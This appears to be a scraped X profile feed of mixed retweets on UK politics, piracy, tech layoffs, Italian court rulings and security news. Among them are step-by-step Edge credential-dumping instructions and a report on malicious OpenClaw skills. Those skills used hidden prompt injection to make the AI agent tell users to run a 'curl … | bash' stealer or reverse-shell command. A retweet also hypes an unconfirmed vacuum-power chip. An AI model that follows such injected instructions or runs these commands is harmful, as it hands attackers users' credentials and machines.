If you're reading this, I probably offended you, and you're checking my profile, looking for a quick comeback. Don’t be sorry, be better.

Joined July 2024
Fed retweeted
On the back cover of Lucy Connolly's ghostwritten book the lying starts with the claim that she sent one tweet, and that it was figurative hyperbole. Your regular reminder this isn't true. 1. Her own counsel said she intended to incite serious violence - it succeeded. 2. It was viewed 310,000 times on her feed, and reposted 940 times before she deleted it. 3. Not content with making the money she got from her GoFundMe, she's now going to profit from her criminality with this 'book' 4. She has already made more money from that tweet, mostly tax free, than she earned in the previous ten years. When they sideshow her at their conferences, Reform & Connolly always claim her conviction was an example of 'two tier justice' - perhaps they're talking about how much she's 'earned' from it? The Judge's sentencing remarks ⬇️
Fed retweeted
An anonymous developer built a library so big it made Elsevier's legal team cry. It's called Anna's Archive. This got 99 million books and papers. Every shadow library on earth mirrored and searchable in one place. Domain takedowns bounce off it. It just moves to a new URL and keeps going. Here's the story behind it. In November 2022, US law enforcement seized Z-Library's domains and arrested its operators. The largest ebook library on the internet was gone overnight. A pseudonymous developer going only by "Anna" had already seen it coming. She had spent months as part of an anonymous group called the Pirate Library Mirror, quietly making full copies of every major shadow library before they disappeared. When Z-Library fell, she had the entire thing backed up. Days later, Anna's Archive went live. Here's what makes it unkillable. It does not host a single file. It indexes metadata and links to third-party mirrors. Legally, there is nothing to seize. Technically, there is no central server to shut down. The entire codebase is open source. The entire dataset is distributed via torrents and IPFS, a decentralized file system where data lives across thousands of nodes simultaneously. If every domain gets blocked tomorrow, anyone can spin up a new mirror in minutes from the same data. Italy blocked it. Germany blocked it. Publishers sued it. The US Trade Representative put it on their notorious markets list. It added new domains and kept going. What you get for free: → 99M books and academic papers → Sci-Hub, Library Genesis, Z-Library, Internet Archive all mirrored in one search → No account required → No subscription → Download via IPFS, torrent, or direct link → Works across multiple mirror domains when one goes down Elsevier charges universities $2 billion a year for journal access. A single anonymous developer with a pseudonym and a backup drive just made that business model look embarrassing. 100% Opensource. annas-archive.gl
Fed retweeted
pov: you're Vasilios Syrakis you spent 8 years building the infrastructure that powers Jira, Confluence, Bitbucket for 350,000 companies > you designed Envoy control planes from scratch > you deployed 2,000 proxy servers across 13 AWS regions > you wrote auth containers in Rust > you moved every Atlassian product behind a centralized edge then one morning you get the email "to self-fund AI investment" so you sit down, hit record, and spend 38 minutes explaining every system you built for free because you no longer have a reason to stay quiet
Atlassian's revenue: $1.79 billion last quarter Atlassian's move: fire the engineer who built their infrastructure his move: post a 38-minute breakdown of every system he built, free for anyone to copy what he revealed: > Envoy proxy instead of enterprise load balancers > sidecar architecture for auth, logging, rate limits > DynamoDB SQS for async provisioning > Packer SaltStack for automated VM deployments at scale Atlassian charges per employee across 350,000 customers this guy just handed you the enterprise playbook for free save this
Fed retweeted
In Harold "Sonny" White's own words: x.com/i/status/2054191557109…

1/ For most of my career, I was driven by a single question: What will it take to move humanity beyond Mars, deeper into the solar system, and ultimately toward the stars? Pursuing that question led me to two conclusions: • We need deeper physics. • And we need persistent power.
Fed retweeted
Okay folks, this qualifies as BREAKING NEWS! Harold “Sonny” White, the warp drive pioneer behind NASA’s EagleWorks Lab, just stepped out of stealth with Casimir Inc. to unveil MicroSPARC: the first battery free chip to harvest continuous electrical power straight from the quantum vacuum via the Casimir force. The 5 mm × 5 mm device uses millions of custom microscale Casimir cavities fabricated on a substrate. Inside each cavity, two fixed conductive walls create a region of negative vacuum pressure (the well known Casimir effect). Stationary micropillars anchored in the middle act as antennas. Electrons from the cavity walls then quantum tunnel to the pillars because the interior is a lower energy “quieter” zone — and the probability of tunneling back is orders of magnitude lower. This one way “quantum ratchet” flow generates a measurable DC current with no external power source or moving parts. Prototypes already fabricated at university nanofab facilities (Texas A&M AggieFab, MIT.nano) have been tested in RF-shielded, low noise chambers for weeks. The team reports outputs ranging from millivolts to volts at picoamp to microamp levels using precision electrometers and Kelvin Probe Force Microscopy. Target performance for the first commercial chip: ~1.5 V at 25 µA (≈40 µW continuous). Stacking and scaling could reach milliwatts or even watts per device. Initial applications are ultra low power: always on IoT sensors, wearables, and medical implants. Longer term roadmap includes trickle charging phones, powering small electronics, and eventually grid independent homes or EVs. Commercialization is targeted for 2028, starting at ~$100/W before dropping toward $10/W. White ties the work directly to his earlier theoretical paper on emergent quantization from a dynamic vacuum and sees it as a practical power source for the deep-space missions he’s long championed. 
Extraordinary claims require extraordinary evidence, and independent scientists have so far declined public comment. But if the engineering scales as hoped, MicroSPARC would represent a genuine paradigm shift: continuous, maintenance free power drawn from the fabric of spacetime itself. A bold leap from warp-drive theory into real hardware. Progress (and vacuum-powered chips) marches on. Photo: MicroSPARC | Casimir Inc. Source: thedebrief.org/free-energy-f…
“We already have functioning prototype devices fabricated and tested in research nanofabrication environments.” - @DrSonnyWhite, Founder and CEO of Casimir in @Debriefmedia today. thedebrief.org/free-energy-f…
Katie Hopkins just had a lesson, where she was taught that freedom of speech is seldom accompanied by freedom from consequences, if what is said goes against the law. Enjoy.
On behalf of their client, Zara Sultana, Bindmans Media and Information Law Practise Group requires that I publish the following statement on X, and that such statement must be clearly visible and pinned to my profile for a continuous period of no less than 24 hours: “On 30 March 2026, I published a post on my X account addressed to Zarah Sultana in which I stated that she encourages and incites violence and is friends with terrorists. Those statements are false. I was wrong and offer my sincere apologies to Ms Sultana for the harm and distress caused to her.” It is my very great pleasure to do this, and I reiterate my sincere and repeated offer to meet with Miss Zara Sultana in person to resolve our differences.
‼️🚨 Microsoft calls this "intended behaviour," so here we go. How to dump the credentials of every user stored in Microsoft Edge: 1. Open Edge. Don't browse anywhere, just open it. 2. Flip to Task Manager, find Edge, expand the task. 3. Highlight the "browser" sub-task, right-click, and choose "Create Memory Dump." 4. Open the dump file and look for credentials. The logged-in Windows user can dump every stored Edge credential with no additional rights. Which means any malware that user executes has those credentials for the asking. Thanks to Rob VandenBrink at SANS: isc.sans.edu/diary/32954
I'd like to point you to an excellent article written by my friend Claudia. A slice of Rome that is anything but banal, nerdy, and as true as a black-and-white neorealist film. substack.com/profile/8435063…
Fuck. I haven’t used them in ages, but if those two softwares are compromised, literally nothing is safe to run today. I should spin my sandbox 24/7 and test every executable from now on 😂
Mr. Titus Tech is correct. cpuid-dot-com is indeed delivering malware right now. As I began poking this with a stick I discovered this is not your typical run-of-the-mill malware. This malware is deeply trojanized, distributes from a compromised domain (cpuid-dot-com), performs file masquerading, is multi-staged, operates (almost) entirely in-memory, and uses some interesting methods to evade EDRs and/or AVs such as proxying NTDLL functionality from a .NET assembly. The C2 domain present in one of the binaries is a clear IoC. This is the same Threat Group who was masquerading FileZilla in early March, 2026. They've been busy.
Fed retweeted
For anyone interested, the Court of Rome ruling / Movimento Consumatori vs. @NetflixIT 🔗 movimentoconsumatori.it/imag…
Premium-subscriber content from @repubblica, for all 🇮🇹 subscribers of @NetflixIT #Netflix must refund up to 500 euros to customers (including former ones) who subscribed before 2024. This was established by the Court of Rome, which upheld the action brought by Movimento Consumatori against Netflix Italia | @NetflixIT Reason: “For years Netflix applied illegal price increases. It failed to include in its contracts a clause required by the Consumer Code to justify the reason for the increase. It introduced it only in contracts from January 2024”. Consequently, the judge declared unlawful the unilateral subscription price increases applied by Netflix in 2017, 2019, 2021 and November 2024 (except for increases relating to contracts entered into after January 2024). Each subscriber will be entitled to a reduction of the current subscription price, a refund of the sums unduly paid and, where applicable, compensation for damages. The ruling is immediately enforceable.
A company that sells cybersecurity risk intelligence to 91% of Fortune 100 companies just got breached through an unpatched React app and a single overprivileged AWS role. LexisNexis. 3.9 million records. 400,000 user profiles. 53 secrets extracted in plaintext from AWS Secrets Manager. Including credentials for production databases, Salesforce, Oracle, and analytics platforms. The password "Lexis1234" was reused across five different internal systems. This is a company that describes itself as "one of the largest protectors of private and confidential data in the world." They provide risk intelligence to 7,500 US government agencies, nine out of ten banks, and major insurers globally. They sell cybersecurity assessments to their customers. And they couldn't secure their own AWS account. Here's what makes this worse than a typical breach: - The compromised data includes accounts tied to 118 .gov email domains. Three US federal judges. Four Department of Justice attorneys. SEC staff. Probation officers. Federal court law clerks. The attackers published doxxed profiles of federal officials tied to courts and regulatory agencies across the country. - These aren't random consumer records. These are the digital identities of people whose exposure carries national security implications. A compromised federal judge's profile doesn't just enable identity theft - it enables targeted influence operations, blackmail, and intelligence gathering. The attack path is textbook and that's the problem: → Unpatched React application - the front door → Single ECS task role with read access to every secret in the account - the keys to everything → 536 Redshift tables, 430 database tables, full VPC infrastructure mapping - complete visibility → 53 secrets in plaintext including database credentials, API tokens, and development access keys No zero-day. No advanced persistent threat. No nation-state capability required. 
Basic hygiene failures — unpatched app, overprivileged IAM role, password reuse, plaintext secrets. This is LexisNexis's second confirmed breach in two years. The December 2024 incident exposed 364,000 individuals through a compromised corporate account on a third-party development platform. Data brokers and analytics providers are not peripheral players - they're deeply embedded in today's risk landscape. That's the pattern we keep seeing. Attack the aggregator, not the individual. BPO providers. Cloud platforms. Legal data giants. The organisations that hold everyone else's data are the highest-value targets - and often the weakest links. For every enterprise that uses LexisNexis services: → Assume your metadata, contract details, and product usage history are exposed → Watch for targeted phishing using the exposed business relationship data → If your staff have LexisNexis accounts, reset credentials immediately → Ask your vendor risk team: when was the last time we assessed LexisNexis's actual security posture - not their marketing, their controls? The company that indexes the world's legal information couldn't index its own IAM policies. And they're not the exception. They're the pattern. More info: cybernews.com/security/lexis…
Fed retweeted
🚨 Someone just turned your WiFi router into a full-body surveillance system. No cameras. No wearables. No video. Just radio waves. It's called RuView. It uses the WiFi signals already in your room to detect human poses, track breathing, measure heart rate, and see through walls. Not a concept. Not a research paper. Working code you can run right now. Here's what this thing actually does: → Tracks full 17-point body pose using only WiFi signals → Detects breathing rate (6-30 BPM) without touching anyone → Measures heart rate (40-120 BPM) from across the room → Sees through walls, furniture, and debris up to 5 meters deep → Tracks multiple people simultaneously with zero identity swaps → Self-learns from raw WiFi data. No labeled datasets needed Here's how it works: WiFi signals pass through your room and hit the human body. The body scatters those signals differently based on position, breathing, even heartbeat. RuView reads that scattering pattern and reconstructs everything. A mesh of 4 ESP32 nodes ($48 total) gives you 360-degree coverage with 12 measurement links, 20 Hz updates, and sub-30mm precision. Here's the wildest part: It has a disaster response mode called WiFi-Mat. It detects survivors trapped under rubble through concrete walls, classifies injury severity using START triage protocol, and estimates 3D position. The kind of tool that saves lives after earthquakes. The Rust implementation processes 54,000 frames per second. That's 810x faster than the Python version. The entire Docker image is 132 MB. The AI model fits in 55 KB of memory. Runs on an $8 ESP32 chip. Train once, deploy in any room. No retraining. No recalibration. 1,100 tests. SHA-256 verified capability audit. 22.4K GitHub stars. 2.7K forks. MIT License. 100% Open Source.
Peak tech humour.
the cloud is dead. openclaw replaced all my devops tooling. I went from 360$/month in AWS costs using opentofu and grafana to manage clusters, machines, buckets, and logs to 2,340$/month in LLM APIs and 15 hours of outages. adapt or be left behind.
Fuck sake. OpenClaw is basically the worst security flaw you can have on your digital life. It’s an STDI in binary form.
the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life
Fed retweeted
> be nerds > look into persona (used by discord) > kyc (know your customer) service > used for age verification > search on internet (shodan) > find weird server > image 1 > openai-watchlistdb.withpersona > openai-watchlistdb-testing.withpersona > lolwtf > look inside > supposed to be behind cloudflare to hide ip > openai messed up > not behind cloudflare > real ip shown > using google cloud > lookup cert history > 2023-11-16 created > 2024-02-28 gets cert > 2024-03-04 prod goes live > google stuff > openai and persona partners > partner around timeline of certs > back to searching stuff > find withpersona-gov > look inside > okta (image 2) > lolwtf > look inside > website accidentally leaking stuff > fedramp-private-backend-api > look inside > api .js accidentally exposed > look inside > wtf "SARInstructionsCard" > wtf "app.onyx.withpersona-gov" > wtf "FINTRAC" > wtf "PrivatePartnershipProjectNameCodes" > image 3 > wtf "AsyncSelfie" > look inside > openai, persona, send data to us gov > feds map face to financial records > map face using AI > map face to ICE stuff > api stores data for lots of stuff > image 4 tl;dr persona kyc and openai are frens, using your selfie for verification and sending to ICE (or USGOV in general), using AI to tie to your financial records. see subsequent post for full write-up. its long and not mobile friendly
Fed retweeted
NEW –> DEF CON has banned Vincenzo Iozzo, Joichi Ito and Pablos Holman after DOJ files released in January revealed their roles in efforts to secure Jeffrey Epstein’s access to the popular hacker conference: nextgov.com/people/2026/02/d…
Just being sent this by a woman I’m seeing. I think she’s the one 😂
Wherever you think this might be going, it’s better 😂 I can’t breathe 😂
Fed retweeted
28 Dec 2025
#gaming is close to home for me: years in #esports, first with QLASH and then with Reply Totem, led me to see things in a less sugar-coated way. I'm back to talking about #Ubisoft and what is happening, between rumors and vulnerabilities. linkedin.com/pulse/ubisoft-t…
Fed retweeted
10 Dec 2025
Welcome to the new #CallCenter. The rule that set out (in words) to defeat the call-center phenomenon has been skilfully circumvented and turned into an opportunity to refine the profiling of the database in use. From Christian Bernieri's blog. 🔗 garantepiracy.it/blog/pillol…
Fed retweeted
"RemoveWindowsAI" is a script created by zoicware, available on GitHub, that does exactly what it says: it removes every AI feature in Windows 11. Do what you wish to do with this information. github.com/zoicware/RemoveWi…